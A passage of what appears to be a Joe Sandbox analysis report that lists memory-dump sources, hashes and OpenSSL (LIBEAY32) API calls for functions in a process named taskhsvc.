                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_get_ex_new_index__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1481378637-0
                                                            • Opcode ID: 57b389f4311ad994d1b51bbeabd798505c880760adaa938e94672023fdd5646f
                                                            • Instruction ID: 6cfc1f4445ae0370a6ceb75a67f30ab4e2c15fd286ac7306e13268359c0ec7bc
                                                            • Opcode Fuzzy Hash: 57b389f4311ad994d1b51bbeabd798505c880760adaa938e94672023fdd5646f
                                                            • Instruction Fuzzy Hash: 5A2186756087409FCB14DF69C280A4AB7F1BB89318F029A1DEAA997700D731A905CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF948A0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __dllonexit_lock_onexit_unlock
                                                            • String ID:
                                                            • API String ID: 209411981-0
                                                            • Opcode ID: 813fa32078a1d5f813fc6adff2eb22e0f5b6bb78b728e51e8c5974e26d685040
                                                            • Instruction ID: c7248f0c2ec9a67eb23b5fe85e5c49a80742a060a67890cae5e5ab46baede169
                                                            • Opcode Fuzzy Hash: 813fa32078a1d5f813fc6adff2eb22e0f5b6bb78b728e51e8c5974e26d685040
                                                            • Instruction Fuzzy Hash: F111E0B09193018FDB40EF78E48465EBBF4FB99249F50492EE4E487710EB348588CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE265BE Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$lh_new
                                                            • String ID:
                                                            • API String ID: 2741105006-0
                                                            • Opcode ID: 8a6f3e769b956617da730939acfc417be8715c9d616ac4a3916e7482961d765d
                                                            • Instruction ID: 25b45751820cd778a1e31d36dc0dd8bdbfaeb7b30665ae1e748c29a3489bcdb6
                                                            • Opcode Fuzzy Hash: 8a6f3e769b956617da730939acfc417be8715c9d616ac4a3916e7482961d765d
                                                            • Instruction Fuzzy Hash: 9701C2B5A28300DFE7049F11D94679ABBF4EB41358F65891DD0D88AA90D3BC85498F53
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF726F0 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OCSP_REQUEST_it.LIBEAY32 ref: 6CF72709
                                                            • ASN1_item_i2d.LIBEAY32 ref: 6CF7271F
                                                            • BIO_printf.LIBEAY32 ref: 6CF72736
                                                              • Part of subcall function 6CECCCD0: BIO_vprintf.LIBEAY32 ref: 6CECCCF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_i2dO_printfO_vprintfT_it
                                                            • String ID: s$v
                                                            • API String ID: 3114603123-3782752948
                                                            • Opcode ID: 58ef79c6492a96798832973ee3f30988870980d547334fab9319606879413725
                                                            • Instruction ID: 65200fbe60d1d874adcf094b96a6e43d498aa60c77b05fc31dfa1b137590ec7d
                                                            • Opcode Fuzzy Hash: 58ef79c6492a96798832973ee3f30988870980d547334fab9319606879413725
                                                            • Instruction Fuzzy Hash: CD0116B56093019FD710DF29D68464BBBF1EF88348F11981EE998CB700E336E846CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE72530 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_endX_getX_start
                                                            • String ID:
                                                            • API String ID: 3014885893-0
                                                            • Opcode ID: 92232fb98018c24af8618afde9246499dc19dbb0d382bbb5b046bddd79c4d609
                                                            • Instruction ID: 40953d2e6e00f01776422058d9c2d855c6ed8ad8a4eeb0c8baf9908b54da5a6f
                                                            • Opcode Fuzzy Hash: 92232fb98018c24af8618afde9246499dc19dbb0d382bbb5b046bddd79c4d609
                                                            • Instruction Fuzzy Hash: E9F0CF705187008FC750EF2AC98091BBBF5AF89348F12691DE9A593701D334E905CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF706F0 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_freeN1_item_new__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 683933353-0
                                                            • Opcode ID: 3906cd266cf29be50c4a2bee592c03b21df0e330f2970418122325d00b29ed3d
                                                            • Instruction ID: c5766f672eeb7962c9632d0041d14221e48d7b174f0df550a7637bfd3ebd98f6
                                                            • Opcode Fuzzy Hash: 3906cd266cf29be50c4a2bee592c03b21df0e330f2970418122325d00b29ed3d
                                                            • Instruction Fuzzy Hash: A5F01D719146418FCB54EF35D28164AB7F0BB8A308F869918E5508B700E335A60A8FD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF36890 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ASN1_TYPE_new.LIBEAY32 ref: 6CF368B2
                                                              • Part of subcall function 6CF17C50: ASN1_item_new.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CF12CD6), ref: 6CF17C65
                                                            • X509_ATTRIBUTE_free.LIBEAY32 ref: 6CF3691B
                                                            • ASN1_TYPE_free.LIBEAY32 ref: 6CF36923
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_free$E_newN1_item_newX509_
                                                            • String ID:
                                                            • API String ID: 3118326150-0
                                                            • Opcode ID: 19014fdd7ee5c6a4c39e746fda0e173bafce7b749b373480a2516db64d603737
                                                            • Instruction ID: af3d32f83479dbca9b5795d558a12d3466d5bd2e49667b5a67314244b2e57969
                                                            • Opcode Fuzzy Hash: 19014fdd7ee5c6a4c39e746fda0e173bafce7b749b373480a2516db64d603737
                                                            • Instruction Fuzzy Hash: 66F058316097109BCB00DF75CA4054FBBE4AB89318F02592CE998D7700D770E9098FD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF80CC0 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF80CE6
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • OBJ_nid2sn.LIBEAY32 ref: 6CF80CEE
                                                            • EVP_get_digestbyname.LIBEAY32 ref: 6CF80CF6
                                                              • Part of subcall function 6CEE97E0: OBJ_NAME_get.LIBEAY32 ref: 6CEE97FD
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_getJ_nid2snJ_obj2nidP_get_digestbynamelh_retrieve
                                                            • String ID:
                                                            • API String ID: 2788379215-0
                                                            • Opcode ID: df1a2d29b0fe8b7dea977d2664622ddffafbf59aeb1b16b015e5c60f2e9504b1
